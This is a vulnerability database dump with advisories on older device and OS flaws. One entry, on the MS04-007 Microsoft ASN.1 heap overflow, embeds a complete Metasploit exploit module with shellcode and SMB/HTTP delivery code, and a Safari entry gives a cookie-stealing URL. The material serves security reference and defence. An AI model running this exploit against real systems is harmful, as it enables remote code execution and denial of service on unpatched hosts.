VARIoT IoT vulnerabilities database

The PKI functionality in Mac OS X 10.2.8 and 10.3.2 allows remote attackers to cause a denial of service (service crash) via malformed ASN.1 sequences. Some versions of the rsync program contain a remotely exploitable vulnerability. This vulnerability may allow an attacker to execute arbitrary code on the target system. This could potentially lead to an attacker crashing a service that uses an implementation of the vulnerable software. This issue is reported to be similar to OpenSSL ASN.1 Large Recursion Remote Denial Of Service Vulnerability described in BID 8970. Due to a lack of details further information concerning this issue cannot be provided at the moment. This BID will be updated as more information becomes available. Mac OS X is an operating system used on Mac machines, based on the BSD system. No detailed vulnerability details are currently available

The Apache module mod_userdir allows access to the user's website directory using a syntax similar to http://example.com/~user/. The default installation configuration of Apache mod_userdir is not secure, and remote attackers can exploit this vulnerability to obtain sensitive information. An attacker can use the mod_userdir error configuration to enumerate sensitive information such as the username on the host, and use this information to further attack the system. It is reported that the Apache mod_userdir module is prone to an information disclosure vulnerability. The issue is reported to exist because the module is configured in an insecure manner by default. It is reported that an attacker may exploit this vulnerability to harvest user account usernames that are present on the affected host

The Linksys WRT54G Router is a router device. The Linksys WRT54G Router is not properly handling some of the GET requests, and the remote attacker can exploit this vulnerability to restart the router. Sending an empty GET request to the router embedded in port 80 of the WEB system listening will cause the router to be restarted, causing a denial of service attack. It has been reported that when the affected appliance handles a request of this type the embedded web server will halt, requiring the appliance to be power cycled in order to regain normal functionality

Cisco Aironet Access Points are wireless access points.  Vulnerabilities in Cisco Aironet Access Points when running Cisco IOS could result in the disclosure of WEP key information.  When the 'snmp-server enable traps wlan-wep' command is set on Cisco Aironet Access Points, AP devices running Cisco IOS software will send WEP keys to the SNMP server in clear text. The affected hardware models include the Cisco Aironet 1100, 1200, and 1400 series. This command is disabled by default. The Cisco Aironet AP model running VxWorks is not affected by this vulnerability.  To determine whether the AP is running Cisco IOS software, as long as the telnet AP address is displayed, if it is simply provided such as apl200% instead of a graphical interface, it indicates that the IOS software is running

Cisco Aironet Access Points are wireless access points. A vulnerability exists in Cisco Aironet Access Points running Cisco IOS that could result in the disclosure of WEP key information. When the Cisco Aironet Access Points have the 'snmp-server enable traps wlan-wep' command set, the AP device running Cisco IOS Software sends the WEP key to the SNMP server in clear text. The affected hardware models include the Cisco Aironet 1100, 1200, and 1400 series, which is turned off by default. The Cisco Aironet AP model running VxWorks is not affected by this vulnerability. To determine if an AP is running Cisco IOS software, as long as the telnet AP address is displayed as simple as apl200% instead of a graphical interface, it indicates that the IOS software is running. The issue has been reported to exist if the 'snmp-server enable traps wlan-wep' command has been set

Detecttr.c is a route detection program. Detecttr.c Due to a lack of adequate checking of hostnames, remote attackers can exploit this vulnerability for format string attacks, which may result in arbitrary instructions being executed on the system with process privileges. The problem is that because the detecttr.c error uses the syslog() function, the hostname is passed directly to the syslog() function without proper format string checking. When logging to the log file, it can cause corrupted memory information, and the commit data may be carefully constructed. Execute arbitrary instructions on the system with process privileges. A remote format string vulnerability has been discovered in the detecttr.c traceroute detection tool, initially released in Phrack magazine. Successful exploitation of this issue could allow an attacker to execute arbitrary code on a vulnerable system with the privileges of the user invoking detecttr

The HP ProCurve Switch is an enterprise network switch. The HP ProCurve Switch has problems handling RCP worms such as W32.Welchia.Worm (MCID 1811) and W32.Blaster.Worm (MCID 1761), causing the switch to stop responding to normal requests, causing a denial of service attack. There are currently no detailed details of the vulnerability. This issue is reported to result in deteriorated network traffic and a denial of service condition for end users

Directory Services in Apple Mac OS X 10.0.2, 10.0.3, 10.2.8, 10.3.2 and Apple Mac OS X Server 10.2 through 10.3.2 accepts authentication server information from unknown LDAP or NetInfo sources as provided by a malicious DHCP server, which allows remote attackers to gain privileges. It has been reported that Apple MacOS X may be prone to a vulnerability that may allow an attacker to gain root access to a vulnerable system via DHCP responses. It has been reported that systems running MacOS X attempt to negotiate DHCP on all available interfaces. If a network is not found, and that system is implementing the use of wireless connectivity, then that system will attempt to connect to any network in order to obtain an address. The system will also attempt to connect to an LDAP or NetInfo server on the network by using DHCP provided fields. The vulnerable host is reported to implicitly trust the server for correct information. It has also been reported that an attacker may set up a malicious server and thereby be able to login to a vulnerable system using any login name and a user id (uid) of 0 in response to DHCP lease requests. Mac OS X is an operating system used on Mac machines, based on the BSD system. The \"Directory Access\" default setting on systems affected by this vulnerability blindly uses and trusts the DHCP fields provided by these servers, and the system does not prevent logins with any login with uid 0. For example, if an LDAP or NetInfo server contains a user named \"bluemeanie\", uid 0, the system will not check the login system window, or any network-provided premises, such as SSH. In most cases, the Mac would need to boot into a malicious environment to exploit this vulnerability (the Netinfod process would have to be restarted to insert the malicious server into its list of authenticated resources)

The Thomson SpeedTouch DSL is a broadband router. Thomson SpeedTouch DSL has problems handling some special types of communications, and remote attackers can exploit this vulnerability to perform denial of service attacks on devices. When an attacker performs a large-scale port scan of a Thomson SpeedTouch DSL router, it will cause the device to stop responding and cause a denial of service. An attacker can use a scanner such as NMAP or Nessus to scan. A problem has been reported in SpeedTouch DSL routers when routing certain types of traffic. Because of this, it may be possible to deny service to legitimate users of a vulnerable router

The HTTP server in the Thomson TWC305, TWC315, and TCW690 cable modem ST42.03.0a allows remote attackers to cause a denial of service (unstable service) via a long GET request, possibly caused by a buffer overflow. A problem has been identified in Thomson Cable Modems when handling long requests on the HTTP port. Because of this, it may be possible for an attacker to deny service to legitimate users of the device. Thomson TCM315 is a broadband wired MODEM device

iproute 2.4.7 and earlier allows local users to cause a denial of service via spoofed messages as other users to the kernel netlink interface. Red Hat Linux Included in iproute In Linux Netlink Check for messages via the interface is improper, so forged messages Linux Netlink There are vulnerabilities that will be accepted if received via the interface.proute A command included in the package interferes with service operation (DoS) It may be in a state. A problem has been discovered in iproute when handling messages from the kernel. Because of this, it may be possible for an attacker to deny service to legitimate users of a system. iproute is an advanced IP routing and network device configuration tool. No detailed vulnerability details are currently available

Apple Safari 1.0 through 1.1 on Mac OS X 10.3.1 and Mac OS X 10.2.8 allows remote attackers to steal user cookies from another domain via a link with a hex-encoded null character (%00) followed by the target domain. An issue has been discovered in Apple Safari, which may allow an attacker to steal cookie-based authentication credentials from a user of a vulnerable web browser. The problem is in the handling of NULL (%00) characters in URLs. This issue may only be exploited to steal cookies set for a domain, as opposed to cookies set for a specific host in that domain. Cookies set with the secure flag can be stolen if the attacker uses SSL. Apple Safari is a WEB browser based on the Apple system. Remote attackers can exploit this vulnerability to construct malicious URLs, lure users to visit them, and steal sensitive cookie information. If the Apple Safari browser loads the following URL for resolution: http://alive.znep.com\\%00www.passport.com/cgi-bin/cookies will cause the Apple Safari browser to connect to \"\\%00\" before host, but sends the cookie to the server based on the entire hostname. This problem can be used to steal the cookie information of a specific path, and through the specific path and SSL in the request URL, it can also steal the cookie information that uses the secure mark

Symbolic link vulnerability in the slpd script slpd.all_init for OpenSLP before 1.0.11 allows local users to overwrite arbitrary files via the route.check temporary file

The FortiGate Firewall is a hardware firewall solution. The WEB interface included in the FortiGate firewall does not adequately filter URL requests. Remote attackers can exploit this vulnerability for cross-site scripting attacks, which can lead to the disclosure of sensitive information. Multiple scripts on the FortiGate firewall's WEB interface do not adequately filter the URI parameters. If you submit parameters containing malicious script code, when the administrator uses the browser to view these logs, these scripts may be executed on the browser and will be leaked. Username and MD5 HASH password information, which can be used to further attack the system. These issues could be exploited by enticing an administrative user to follow a malicious link that includes hostile HTML and script code as values for URI parameters. If such a link is followed, the hostile code may be rendered in the administrator's browser

The getifaddrs function in GNU libc (glibc) 2.2.4 and earlier allows local users to cause a denial of service by sending spoofed messages as other users to the kernel netlink interface. Applications which make use of the kernel Netlink interface are said to be prone to denial of service attacks. It has been reported that applications implementing the getifaddrs() glibc function may be prone to denial of service attacks. The problem is said to occur due to the way getifaddrs() interacts with the netlink device. Under some circumstances, an anonymous netlink message handled by the getifaddrs() function may cause the application to crash. Red Hat has stated that GNU Zebra, Quagga and iproute are also affected by this vulnerability due to the way they interact with the netlink interface; exploitation may result in a denial of service. The precise technical details regarding this issue are currently unknown. This BID will be updated, as further information is made available. kernel Netlink is a network interface implementation

The vty layer in Quagga before 0.96.4, and Zebra 0.93b and earlier, does not verify that sub-negotiation is taking place when processing the SE marker, which allows remote attackers to cause a denial of service (crash) via a malformed telnet command to the telnet CLI port, which may trigger a null dereference. GNU Zebra A password is set, and zebra If the connection to the module's management port is valid: telnet Sending an undefined code that does not exist as an option when connecting will cause a segmentation violation, zebra A vulnerability exists that causes the daemon to crash.zebra Daemon interferes with service operation (DoS) It may be in a state. It has been reported that Zebra, as well as Quagga, may be vulnerable to a remote denial of service vulnerability that may allow an attacker to cause the software to crash or hang. The issue is reported to occur if an attacker attempts to connect to the Zebra telnet management port while a password is enabled. The program will crash when attempting to dereference an invalid, possibly NULL, pointer. All versions of GNU Zebra are said to be vulnerable to this issue. All versions of Quagga prior to 0.96.4 are also vulnerable

Multiple integer overflows in Microsoft ASN.1 library (MSASN1.DLL), as used in LSASS.EXE, CRYPT32.DLL, and other Microsoft executables and libraries on Windows NT 4.0, 2000, and XP, allow remote attackers to execute arbitrary code via ASN.1 BER encodings with (1) very large length fields that cause arbitrary heap data to be overwritten, or (2) modified bit strings. Microsoft Windows ASN.1 Library (msasn1.dll) Has a vulnerability related to integer overflow. For the vulnerability, arbitrary code may be executed remotely.A third party from a distance SYSTEM May execute arbitrary code with privileges. As a result, it is possible to gain administrative privileges on vulnerable systems. The issue presents itself in the ASN.1 bit string decoding routines, specifically the BERDecBitString() function. The issue manifests when the affected function attempts to process a constructed bit string that contain another nested constructed bit string. This vulnerability is exposed in a number of security related operating system components, including Kerberos (via UDP port 88), Microsoft IIS with SSL support enabled and NTLMv2 authentication (via TCP ports 135, 139 and 445). Other components may also be affected, though a comprehensive list is not available at this time. Client applications, which use the library, will be affected, including LSASS.EXE and CRYPT32.DLL (and any application that relies on CRYPT32.DLL). The vulnerable library is used frequently in components that handle certificates such as Internet Explorer and Outlook. Handling of signed ActiveX components could also present an exposure. It should be noted that because ASN.1 data will likely be encoded, for example Kerberos, SSL, IPSec or Base64 encoded, the malicious integer values may be obfuscated and as a result not easily detectable. Issues related to this vulnerability were originally covered in BID 9626 and 9743, further information has been made available which identifies that this is a distinct vulnerability in the library and so this specific issue has been assigned an individual BID. ** June 5, 2005 Update: An IRC bot style tool may be exploiting this vulnerability. This alert will be updated as further information becomes available. This issue is related to insufficient checking of data supplied via an externally supplied length field in ASN.1 BER encoded data. This could result in an excessive value being used in a heap allocation routine, allowing for large amounts of heap memory to be corrupted. This could be leveraged to corrupt sensitive values in memory, resulting in execution of arbitrary code. Exploitation of this issue will result in the corruption of heap based management structures, and may ultimately be leveraged by an attacker to have arbitrary code executed in the context of the affected process. ## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::SMB def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft ASN.1 Library Bitstring Heap Overflow', 'Description' => %q{ This is an exploit for a previously undisclosed vulnerability in the bit string decoding code in the Microsoft ASN.1 library. Both vulnerabilities were fixed in the MS04-007 patch. You are only allowed one attempt with this vulnerability. If the payload fails to execute, the LSASS system service will crash and the target system will automatically reboot itself in 60 seconds. If the payload succeeeds, the system will no longer be able to process authentication requests, denying all attempts to login through SMB or at the console. A reboot is required to restore proper functioning of an exploited system. This exploit has been successfully tested with the win32/*/reverse_tcp payloads, however a few problems were encounted when using the equivalent bind payloads. Your mileage may vary. }, 'Author' => [ 'Solar Eclipse <solareclipse@phreedom.org>' ], 'License' => GPL_LICENSE, 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-0818'], [ 'OSVDB', '3902' ], [ 'BID', '9633'], [ 'URL', 'http://www.phreedom.org/solar/exploits/msasn1-bitstring/'], [ 'MSB', 'MS04-007'], ], 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, 'Privileged' => true, 'Payload' => { 'Space' => 1024, 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Windows 2000 SP2-SP4 + Windows XP SP0-SP1', # Tested OK - 11/25/2005 hdm (bind failed) { 'Platform' => 'win', }, ], ], 'DisclosureDate' => 'Feb 10 2004', 'DefaultTarget' => 0)) register_options( [ OptString.new('PROTO', [ true, "Which protocol to use: http or smb", 'smb']), ], self.class) end # This exploit is too destructive to use during automated exploitation. # Better Windows-based exploits exist at this time (Sep 2006) def autofilter false end # This is a straight port of Solar Eclipse's "kill-bill" exploit, published # as a Metasploit Framework module with his permission. This module is only # licensed under GPLv2, keep this in mind if you embed the Framework into # a non-GPL application. -hdm[at]metasploit.com def exploit # The first stage shellcode fixes the PEB pointer and cleans the heap stage0 = "\x53\x56\x57\x66\x81\xec\x80\x00\x89\xe6\xe8\xed\x00\x00\x00\xff"+ "\x36\x68\x09\x12\xd6\x63\xe8\xf7\x00\x00\x00\x89\x46\x08\xe8\xa2"+ "\x00\x00\x00\xff\x76\x04\x68\x6b\xd0\x2b\xca\xe8\xe2\x00\x00\x00"+ "\x89\x46\x0c\xe8\x3f\x00\x00\x00\xff\x76\x04\x68\xfa\x97\x02\x4c"+ "\xe8\xcd\x00\x00\x00\x31\xdb\x68\x10\x04\x00\x00\x53\xff\xd0\x89"+ "\xc3\x56\x8b\x76\x10\x89\xc7\xb9\x10\x04\x00\x00\xf3\xa4\x5e\x31"+ "\xc0\x50\x50\x50\x53\x50\x50\xff\x56\x0c\x8b\x46\x08\x66\x81\xc4"+ "\x80\x00\x5f\x5e\x5b\xff\xe0\x60\xe8\x23\x00\x00\x00\x8b\x44\x24"+ "\x0c\x8d\x58\x7c\x83\x43\x3c\x05\x81\x43\x28\x00\x10\x00\x00\x81"+ "\x63\x28\x00\xf0\xff\xff\x8b\x04\x24\x83\xc4\x14\x50\x31\xc0\xc3"+ "\x31\xd2\x64\xff\x32\x64\x89\x22\x31\xdb\xb8\x90\x42\x90\x42\x31"+ "\xc9\xb1\x02\x89\xdf\xf3\xaf\x74\x03\x43\xeb\xf3\x89\x7e\x10\x64"+ "\x8f\x02\x58\x61\xc3\x60\xbf\x20\xf0\xfd\x7f\x8b\x1f\x8b\x46\x08"+ "\x89\x07\x8b\x7f\xf8\x81\xc7\x78\x01\x00\x00\x89\xf9\x39\x19\x74"+ "\x04\x8b\x09\xeb\xf8\x89\xfa\x39\x5a\x04\x74\x05\x8b\x52\x04\xeb"+ "\xf6\x89\x11\x89\x4a\x04\xc6\x43\xfd\x01\x61\xc3\xa1\x0c\xf0\xfd"+ "\x7f\x8b\x40\x1c\x8b\x58\x08\x89\x1e\x8b\x00\x8b\x40\x08\x89\x46"+ "\x04\xc3\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea"+ "\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x38\x49\x8b\x34\x8b\x01\xee"+ "\x31\xff\x31\xc0\xfc\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb"+ "\xf4\x3b\x7c\x24\x24\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b"+ "\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc2"+ "\x08\x00\xeb\xfe" token = spnego_token(stage0, payload.encoded) case datastore['PROTO'] when 'smb' exploit_smb(token) when 'http' exploit_http(token) else print_status("Invalid application protocol specified, use smb or http") end end def exploit_smb(token) connect client = Rex::Proto::SMB::Client.new(sock) begin client.session_request(smb_hostname()) if not datastore['SMBDirect'] client.negotiate client.session_setup_ntlmv2_blob(token) rescue => e if (e.to_s =~ /error code 0x00050001/) print_status("The target system has already been exploited") else print_status("Error: #{e}") end end handler disconnect end def exploit_http(token) connect req = "GET / HTTP/1.0\r\n" req << "Host: #{ datastore['RHOST']}\r\n" req << "Authorization: Negotiate #{Rex::Text.encode_base64(token, '')}\r\n\r\n" sock.put(req) res = sock.get_once if (res and res =~ /0x80090301/) print_status("This server does not support the Negotiate protocol or has already been exploited") end if (res and res =~ /0x80090304/) print_status("This server responded with error code 0x80090304 (wth?)") end handler disconnect end # Returns an ASN.1 encoded string def enc_asn1(str) Rex::Proto::SMB::Utils::asn1encode(str) end # Returns an ASN.1 encoded bit string with 0 unused bits def enc_bits(str) "\x03" + enc_asn1("\x00" + str) end # Returns a BER encoded constructed bit string def enc_constr(*str_arr) "\x23" + enc_asn1(str_arr.join('')) end # Returns a BER encoded SPNEGO token def spnego_token(stage0, stage1) if !(stage0 and stage1) print_status("Invalid parameters passed to spnego_token") return end if (stage0.length > 1032) print_status("The stage 0 shellcode is longer than 1032 bytes") return end tag = "\x90\x42\x90\x42\x90\x42\x90\x42" if ((tag.length + stage1.length) > 1033) print_status("The stage 1 shellcode is too long") return end # The first two overwrites must succeed, so we write to an unused location # in the PEB block. We don't care about the values, because after this the # doubly linked list of free blocks is corrupted and we get to the second # overwrite which is more useful. fw = "\xf8\x0f\x01\x00" # 0x00010ff8 bk = "\xf8\x0f\x01" # The second overwrite writes the address of our shellcode into the # FastPebLockRoutine pointer in the PEB peblock = "\x20\xf0\xfd\x7f" # FastPebLockRoutine in PEB bitstring = enc_constr( enc_bits("A" * 1024), "\x03\x00", enc_constr( enc_bits(tag + stage1 + ("B" * (1033-(tag+stage1).length))), enc_constr( enc_bits(fw + bk) ), enc_constr( enc_bits("CCCC" + peblock + stage0 + ("C" * (1032-stage0.length))), enc_constr( enc_bits("\xeb\x06" + make_nops(6)), enc_bits("D" * 1040) ) ) ) ) token = "\x60" + enc_asn1( # Application Constructed Object "\x06\x06\x2b\x06\x01\x05\x05\x02" + # SPNEGO OID "\xa0" + enc_asn1( # NegTokenInit (0xa0) "\x30" + enc_asn1( "\xa1" + enc_asn1( bitstring ) ) ) ) return token end end . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Multiple Vulnerabilities in Microsoft ASN.1 Library Original issue date: February 10, 2004 Last revised: -- Source: US-CERT A complete revision history is at the end of this document. According to information from eEye Digital Security, the vulnerabilities involve integer overflows and other flaws in integer arithmetic. Any application that loads the ASN.1 library could serve as an attack vector. In particular, ASN.1 is used by a number of cryptographic and authentication services such as digital certificates (x.509), Kerberos, NTLMv2, SSL,and TLS. Both client and server systems are affected. The Local Security Authority Subsystem (lsass.exe) and a component of the CryptoAPI (crypt32.dll) use the vulnerable ASN.1 library. Solution Apply a patch Apply the appropriate patch as specified by Microsoft Security Bulletin MS04-007. Vendor Information This appendix contains information provided by vendors. When vendors report new information, this section is updated and the changes are noted in the revision history. If a vendor is not listed below, we have not received their comments. Microsoft Please see Microsoft Security Bulletin MS04-007. References * Vulnerability Note VU#216324 - <http://www.kb.cert.org/vuls/id/216324> * Vulnerability Note VU#583108 - <http://www.kb.cert.org/vuls/id/583108> * eEye Digital Security Advisory AD20040210 - <http://www.eeye.com/html/Research/Advisories/AD20040210.html> * eEye Digital Security Advisory AD20040210-2 - <http://www.eeye.com/html/Research/Advisories/AD20040210-2.html> * Microsoft Security Bulletin MS04-007 - <http://microsoft.com/technet/security/bulletin/MS04-007.asp> * Microsoft Knowledge Base Article 252648 - <http://support.microsoft.com/default.aspx?scid=252648> _________________________________________________________________ These vulnerabilities were researched and reported by eEye Digital Security. Information from eEye and Microsoft was used in this document. _________________________________________________________________ Feedback can be directed to the author, Art Manion. Copyright 2004 Carnegie Mellon University. Revision History February 10, 2004: Initial release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iD8DBQFAKVrdXlvNRxAkFWARAuOvAJwL2gJJPBRdrtZ0Le4yyLQLu7CHewCgvaCW 5hU8LQ/oOC4sI8PpnkppCyg= =Oe/N -----END PGP SIGNATURE-----

Unknown vulnerability in the SmartHTML interpreter (shtml.dll) in Microsoft FrontPage Server Extensions 2000 and 2002, and Microsoft SharePoint Team Services 2002, allows remote attackers to cause a denial of service (response failure) via a certain request. This issue could be exploited to deny availability of CPU resources on the system, potentially causing a denial of service condition

Buffer overflow in the debug functionality in fp30reg.dll of Microsoft FrontPage Server Extensions (FPSE) 2000 and 2002 allows remote attackers to execute arbitrary code via a crafted chunked encoded request. It is possible to trigger this condition with a chunked-encoded HTTP POST request

Unknown vulnerability in the Terminal application for Mac OS X 10.3 (Client and Server) may allow "unauthorized access.". The precise technical details regarding this issue are currently unknown, however it is believed that a local user may exploit a flaw in Terminal to possibly gain elevated privileges. Mac OS X is an operating system used on Mac machines, based on the BSD system. No detailed vulnerability details are currently available